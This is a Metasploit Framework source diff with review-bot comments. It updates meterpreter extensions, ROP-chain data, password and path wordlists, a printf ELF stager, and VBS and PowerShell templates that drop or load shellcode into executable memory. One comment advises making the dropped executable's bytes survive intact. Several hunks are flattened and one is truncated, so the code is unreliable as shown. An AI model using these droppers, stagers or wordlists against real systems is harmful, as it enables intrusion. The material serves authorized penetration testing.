Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ
diff --git a/data/meterpreter/ext_server_networkpug.lso b/data/meterpreter/ext_server_networkpug.lso
index 4d0eea9cbe..dd133a03b2 100755
Binary files a/data/meterpreter/ext_server_networkpug.lso and b/data/meterpreter/ext_server_networkpug.lso differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
index 2f10f3d45c..7402d1c2b5 100755
Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ
diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll
index bb31216859..192d1a1f14 100755
Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.lso b/data/meterpreter/ext_server_sniffer.lso
index bd6e0e4392..cc372cada0 100755
Binary files a/data/meterpreter/ext_server_sniffer.lso and b/data/meterpreter/ext_server_sniffer.lso differ
diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll
index 87f05c0df6..0e552fbc18 100755
Binary files a/data/meterpreter/ext_server_sniffer.x64.dll and b/data/meterpreter/ext_server_sniffer.x64.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.x86.dll b/data/meterpreter/ext_server_sniffer.x86.dll
index 2a99ab0b0f..1ec48f7317 100755
Binary files a/data/meterpreter/ext_server_sniffer.x86.dll and b/data/meterpreter/ext_server_sniffer.x86.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.lso b/data/meterpreter/ext_server_stdapi.lso
index f4b0096b1b..a4a50425f5 100755
Binary files a/data/meterpreter/ext_server_stdapi.lso and b/data/meterpreter/ext_server_stdapi.lso differ
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index 98b1c235d0..b64b7278e4 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
 TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
 TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
 TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
+TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
+TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
 # Socket
 TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
@@ -273,6 +275,9 @@ ERROR_FAILURE = 1
 # errors.
 ERROR_CONNECTION_ERROR = 10000
+WIN_AF_INET = 2
+WIN_AF_INET6 = 23
+
 def get_stat_buffer(path):
 si = os.stat(path)
 rdev = 0
@@ -290,6 +295,27 @@ def get_stat_buffer(path):
 st_buf += struct.pack('II', pkt[offset:offset+8])
+ if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
+ val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
+ if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+ val = val.split('\x00', 1)[0]
+ elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+ val = struct.unpack('>I', val)[0]
+ elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
+ val = bool(struct.unpack('b', val)[0])
+ elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+ pass
+ yield {'type':tlv[1], 'length':tlv[0], 'value':val}
+ offset += tlv[0]
+ raise StopIteration()
+
 def tlv_pack(*args):
 if len(args) == 2:
 tlv = {'type':args[0], 'value':args[1]}
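Review bot: The third hunk ends the new generator with `raise StopIteration()`, which is redundant — falling off the end of a generator body already ends iteration — and under PEP 479 (Python 3.7+) an explicit StopIteration raised inside a generator is converted into a RuntimeError; replace it with a bare `return` or drop the line. The guard `if (tlv_type == None) or …` should compare with `is None`. The generator's `def` line and loop header are not visible here: the text between `struct.pack('II', ` and `pkt[offset:offset+8])` appears truncated by the extraction, so the function's signature and the context line it follows cannot be checked from this page.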
@@ -271,7 +289,7 @@ class PythonMeterpreter(object):
 if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 return ERROR_FAILURE
 preloadlib_methods = self.extension_functions.keys()
- i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
+ i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
 i.runcode(compile(data_tlv['value'], '', 'exec'))
 postloadlib_methods = self.extension_functions.keys()
 new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index e94b10adb6..1d2e6aab06 100755
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll
index 4c4060cefa..4fcde5c904 100755
Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ
diff --git a/data/meterpreter/msflinker_linux_x86.bin b/data/meterpreter/msflinker_linux_x86.bin
index d2d3863f5f..b513c89892 100644
Binary files a/data/meterpreter/msflinker_linux_x86.bin and b/data/meterpreter/msflinker_linux_x86.bin differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index 8e31407346..77eb2ca68b 100755
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll
index e879e968bb..171de74972 100755
Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ
diff --git a/data/ropdb/hxds.xml b/data/ropdb/hxds.xml
index 49c2a0a9a5..5531d05c06 100644
--- a/data/ropdb/hxds.xml
+++ b/data/ropdb/hxds.xml
@@ -11,7 +11,7 @@ POP EBP # RETN skip 4 bytes POP EBX # RETN - 0x00000201 + Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # RETN XCHG EAX, EBX # RETN
@@ -40,7 +40,7 @@ POP EBP # RETN skip 4 bytes POP EBX # RETN - 0x00000201 + Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # POP ESI # RETN JUNK
diff --git a/data/ropdb/java.xml b/data/ropdb/java.xml
index 1985d5c4d2..3a3959ce84 100644
--- a/data/ropdb/java.xml
+++ b/data/ropdb/java.xml
@@ -9,7 +9,7 @@ POP EBP # RETN skip 4 bytes POP EAX # RETN - 0x00000201 + 0x00000201 NEG EAX # RETN POP EBX # RETN
diff --git a/data/ropdb/msvcrt.xml b/data/ropdb/msvcrt.xml
index 177767e9c0..2a5416d0c2 100644
--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -8,7 +8,7 @@ POP EAX # RETN - 0xFFFFFBFF -> ebx + 0xFFFFFBFF -> ebx NEG EAX # POP EBP # RETN JUNK POP EBX # RETN
diff --git a/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238 b/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
deleted file mode 100755
index 1bf636272d..0000000000
--- a/data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
+++ /dev/null
@@ -1,13 +0,0 @@ -K 10 -ascii_cert -V 1844 -MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+ -K 8 -failures -V 1 -8 -K 15 -svn:realmstring -V 26 -https://metasploit.com:443 -END 
diff --git a/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 b/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 deleted file mode 100755 index 0a1825026f..0000000000 --- a/data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229 +++ /dev/null 
@@ -1,13 +0,0 @@ -K 10 -ascii_cert -V 1844 -MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+ -K 8 -failures -V 1 -8 -K 15 -svn:realmstring -V 30 -https://www.metasploit.com:443 -END 
diff --git a/data/templates/scripts/to_exe.vbs.template b/data/templates/scripts/to_exe.vbs.template index 102d2787bb..a6ee5f30bb 100644 --- a/data/templates/scripts/to_exe.vbs.template +++ b/data/templates/scripts/to_exe.vbs.template @@ -1,5 +1,5 @@ Function %{var_func}() -%{var_shellcode} + %{var_shellcode} = "%{hex_shellcode}" Dim %{var_obj} Set %{var_obj} = CreateObject("Scripting.FileSystemObject") @@ -10,9 +10,11 @@ Function %{var_func}() Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() %{var_obj}.CreateFolder(%{var_basedir}) - %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + %{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}" Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false) - %{var_stream}.Write %{var_bytes} + For i = 1 to Len(%{var_shellcode}) Step 2 + %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2))) + Next %{var_stream}.Close Dim %{var_shell} Set %{var_shell} = CreateObject("Wscript.Shell") diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template index 6185274299..3641ac94ef 100644 --- a/data/templates/scripts/to_mem_dotnet.ps1.template +++ b/data/templates/scripts/to_mem_dotnet.ps1.template @@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A $%{var_compileParams}.GenerateInMemory = $True $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) -%{shellcode} +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } 
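Review bot: The hex-decoding loop added in the second hunk (`For i = 1 to Len(%{var_shellcode}) Step 2`) uses a bare `i`, the only identifier in the template that is not a `%{var_*}` placeholder, so it is constant across every generated script and, never being `Dim`ed, would also fail under `Option Explicit`; a generator-supplied name such as `Dim %{var_i}` / `For %{var_i} = 1 To ...` keeps the template uniform. The loop also writes each byte with `Chr(CLng("&H" & ...))` through a text stream opened as ANSI (`CreateTextFile(..., true, false)`): `Chr` maps 128–255 through the system ANSI code page, so on a DBCS or non-Latin-1 locale some byte values may not round-trip and the dropped executable would be corrupted — worth a caveat comment in the template, or a byte-oriented write (for example an ADODB.Stream in binary mode) if that has been observed in practice. `Function %{var_func}` opens in the first hunk and continues past the end of the second.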
diff --git a/data/wordlists/http_owa_common.txt b/data/wordlists/http_owa_common.txt index 86c0c93c88..1eb1de5edf 100644 --- a/data/wordlists/http_owa_common.txt +++ b/data/wordlists/http_owa_common.txt @@ -1,5 +1,6 @@ aspnet_client/ Autodiscover/ +exchange/ ecp/ EWS/ Microsoft-Server-ActiveSync/ diff --git a/data/wordlists/sap_icm_paths.txt b/data/wordlists/sap_icm_paths.txt index 903a8a1843..f35f5f718d 100755 --- a/data/wordlists/sap_icm_paths.txt +++ b/data/wordlists/sap_icm_paths.txt @@ -1,3 +1,4 @@ +/AdapterFramework/version/version.jsp /AdobeDocumentServices/Config /AdobeDocumentServices/Config?wsdl /AE/index.jsp @@ -319,6 +320,7 @@ /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory +/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp /webdynpro/dispatcher/sap.com/tc~wd~tools /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer diff --git a/data/wordlists/snmp_default_pass.txt b/data/wordlists/snmp_default_pass.txt index 936da894bc..65359993d5 100755 --- a/data/wordlists/snmp_default_pass.txt +++ b/data/wordlists/snmp_default_pass.txt @@ -92,6 +92,7 @@ root router rw rwa +s!a@m#n$p%c san-fran sanfran scotty diff --git a/lib/msf/core/auxiliary/jtr.rb b/lib/msf/core/auxiliary/jtr.rb index 6b9ddb322b..c1053918eb 100644 --- a/lib/msf/core/auxiliary/jtr.rb +++ b/lib/msf/core/auxiliary/jtr.rb 
@@ -32,50 +32,62 @@ module Auxiliary::JohnTheRipper ) @run_path = nil - @john_path = ::File.join(Msf::Config.install_root, "data", "john") + @john_path = ::File.join(Msf::Config.data_directory, "john") autodetect_platform end + # @return [String] the run path instance variable if the platform is detectable, nil otherwise. def autodetect_platform - cpuinfo_base = ::File.join(Msf::Config.install_root, "data", "cpuinfo") return @run_path if @run_path + cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo") + if File.directory?(cpuinfo_base) + data = nil - case ::RUBY_PLATFORM - when /mingw|cygwin|mswin/ - data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil - case data - when /sse2/ - @run_path ||= "run.win32.sse2/john.exe" - when /mmx/ - @run_path ||= "run.win32.mmx/john.exe" - else - @run_path ||= "run.win32.any/john.exe" - end - - when /x86_64-linux/ - ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil - data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil - case data - when /mmx/ - @run_path ||= "run.linux.x64.mmx/john" - else - @run_path ||= "run.linux.x86.any/john" - end - - when /i[\d]86-linux/ - ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil - data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil - case data - when /sse2/ - @run_path ||= "run.linux.x86.sse2/john" - when /mmx/ - @run_path ||= "run.linux.x86.mmx/john" - else - @run_path ||= "run.linux.x86.any/john" + case ::RUBY_PLATFORM + when /mingw|cygwin|mswin/ + fname = "#{cpuinfo_base}/cpuinfo.exe" + if File.exists?(fname) and File.executable?(fname) + data = %x{"#{fname}"} rescue nil + end + case data + when /sse2/ + @run_path ||= "run.win32.sse2/john.exe" + when /mmx/ + @run_path ||= "run.win32.mmx/john.exe" + else + @run_path ||= "run.win32.any/john.exe" + end + when /x86_64-linux/ + fname = "#{cpuinfo_base}/cpuinfo.ia64.bin" + if File.exists? 
fname + ::FileUtils.chmod(0755, fname) rescue nil + data = %x{"#{fname}"} rescue nil + end + case data + when /mmx/ + @run_path ||= "run.linux.x64.mmx/john" + else + @run_path ||= "run.linux.x86.any/john" + end + when /i[\d]86-linux/ + fname = "#{cpuinfo_base}/cpuinfo.ia32.bin" + if File.exists? fname + ::FileUtils.chmod(0755, fname) rescue nil + data = %x{"#{fname}"} rescue nil + end + case data + when /sse2/ + @run_path ||= "run.linux.x86.sse2/john" + when /mmx/ + @run_path ||= "run.linux.x86.mmx/john" + else + @run_path ||= "run.linux.x86.any/john" + end end end - @run_path + + return @run_path end def john_session_id diff --git a/lib/msf/core/auxiliary/mime_types.rb b/lib/msf/core/auxiliary/mime_types.rb index afebdeffc0..08a04b0189 100644 --- a/lib/msf/core/auxiliary/mime_types.rb +++ b/lib/msf/core/auxiliary/mime_types.rb @@ -23,7 +23,7 @@ module Auxiliary::MimeTypes end def mime_load_extension_map - path = File.join( Msf::Config.install_root, "data", "mime.yml") + path = File.join( Msf::Config.data_directory, "mime.yml") @extension_map = YAML.load_file(path) end diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index bce0235d93..ef92dcb7da 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri' require 'rex/parser/nmap_nokogiri' require 'rex/parser/openvas_nokogiri' require 'rex/parser/wapiti_nokogiri' +require 'rex/parser/outpost24_nokogiri' # Legacy XML parsers -- these will be converted some day require 'rex/parser/ip360_aspl_xml' 
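Review bot: All three platform branches of the rewritten `autodetect_platform` spell the existence check `File.exists?`, and the Windows branch joins its two checks with `and`; `File.exist?` is the non-deprecated name and `&&` avoids the low-precedence surprise, i.e. `if File.exist?(fname) && File.executable?(fname)`. The Linux branches differ from the Windows one in a way that deserves a comment: on the strength of an existence check alone they `chmod` the helper to 0755 and execute it, so any regular file at `data/cpuinfo/cpuinfo.ia64.bin` (or `.ia32.bin`) is made executable and run, whereas Windows additionally requires `File.executable?` — if the data directory is considered trusted, say so in a comment; otherwise apply the same guard after the chmod. The trailing `rescue nil` modifiers swallow every error, including the helper crashing, which is why a broken binary silently degrades to the `any` build; that is reasonable for best-effort detection but a one-line comment would make it clearly intentional.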
@@ -2926,7 +2927,7 @@ class DBManager # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml - # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml + # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml # If there is no match, an error is raised instead. def import_filetype_detect(data) @@ -3059,6 +3060,9 @@ class DBManager @import_filedata[:type] = "CI" return :ci_xml end + when "main" + @import_filedata[:type] = "Outpost24 XML" + return :outpost24_xml else # Give up if we haven't hit the root tag in the first few lines break if line_count > 10 @@ -3649,7 +3653,7 @@ class DBManager data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)} wspace = args[:wspace] || args['wspace'] || workspace bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] - basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf") + basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf") allow_yaml = false btag = nil 
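Review bot: The new `when "main"` arm fingerprints Outpost24 output by nothing more than a root element called `main`, which is a generic name; this `case` appears to pick the first matching root tag, so any unrelated XML document rooted at `<main>` will now be routed to the Outpost24 importer instead of reaching the documented "no match" error. If the Outpost24 root carries a distinguishing attribute or namespace (not visible here), checking it alongside the tag name would make the detection far less accidental. Failing that, the looseness should at least be recorded: `# Outpost24 reports use a bare <main> root element; nothing more specific is available to key on`. `import_filetype_detect` begins before this hunk and continues after it.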
@@ -5923,6 +5927,36 @@ class DBManager parser.parse(args[:data]) end + def import_outpost24_xml(args={}, &block) + bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : [] + wspace = args[:wspace] || workspace + if Rex::Parser.nokogiri_loaded + parser = "Nokogiri v#{::Nokogiri::VERSION}" + noko_args = args.dup + noko_args[:blacklist] = bl + noko_args[:wspace] = wspace + if block + yield(:parser, parser) + import_outpost24_noko_stream(noko_args) {|type, data| yield type,data} + else + import_outpost24_noko_stream(noko_args) + end + return true + else # Sorry + raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.") + end + end + + def import_outpost24_noko_stream(args={},&block) + if block + doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data } + else + doc = Rex::Parser::Outpost24Document.new(args,self) + end + parser = ::Nokogiri::XML::SAX::Parser.new(doc) + parser.parse(args[:data]) + end + def unserialize_object(xml_elem, allow_yaml = false) return nil unless xml_elem diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb old mode 100755 new mode 100644 diff --git a/lib/msf/core/exploit/cmdstager_debug_asm.rb b/lib/msf/core/exploit/cmdstager_debug_asm.rb index a90cb806c3..acaeed53d0 100644 --- a/lib/msf/core/exploit/cmdstager_debug_asm.rb +++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]), ], self.class) end diff --git a/lib/msf/core/exploit/cmdstager_debug_write.rb b/lib/msf/core/exploit/cmdstager_debug_write.rb index f8be9c239f..53ded3ab55 100644 --- a/lib/msf/core/exploit/cmdstager_debug_write.rb 
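Review bot: `import_outpost24_xml` resolves the workspace with `args[:wspace] || workspace`, while the existing importers in this file accept both key spellings (`args[:wspace] || args['wspace'] || workspace`, as in the `@@ -3649` hunk above); a caller using the string key therefore silently lands in the default workspace, so use the three-way form here too. In `import_outpost24_noko_stream` the block branch constructs the document with `framework.db` and the non-block branch with `self`; inside DBManager these presumably name the same object, but the asymmetry is a trap for later edits and `self` in both branches would be unambiguous. Neither method has a doc comment; one line noting that `args[:data]` is the raw XML string and that `args[:blacklist]` is a whitespace-separated list of IPs to skip would help the next reader.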
+++ b/lib/msf/core/exploit/cmdstager_debug_write.rb @@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite register_advanced_options( [ OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.', - File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]), + File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]), ], self.class) end diff --git a/lib/msf/core/exploit/cmdstager_printf.rb b/lib/msf/core/exploit/cmdstager_printf.rb new file mode 100644 index 0000000000..faad1f9d2a --- /dev/null +++ b/lib/msf/core/exploit/cmdstager_printf.rb @@ -0,0 +1,27 @@ +# -*- coding: binary -*- + +require 'msf/core/exploit/cmdstager' + +module Msf + +#### +# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf. +# +# This stager uses a POSIX-conformant printf, that supports the interpretation +# of octal escapes, to drop an ELF with the payload embedded to disk. +#### + +module Exploit::CmdStagerPrintf + + include Msf::Exploit::CmdStager + + # Initializes a CmdStagerPrintf instance for the supplied payload + # + # @param exe [String] The payload embedded into an ELF + # @return [Rex::Exploitation::CmdStagerPrintf] Stager instance + def create_stager(exe) + Rex::Exploitation::CmdStagerPrintf.new(exe) + end +end + 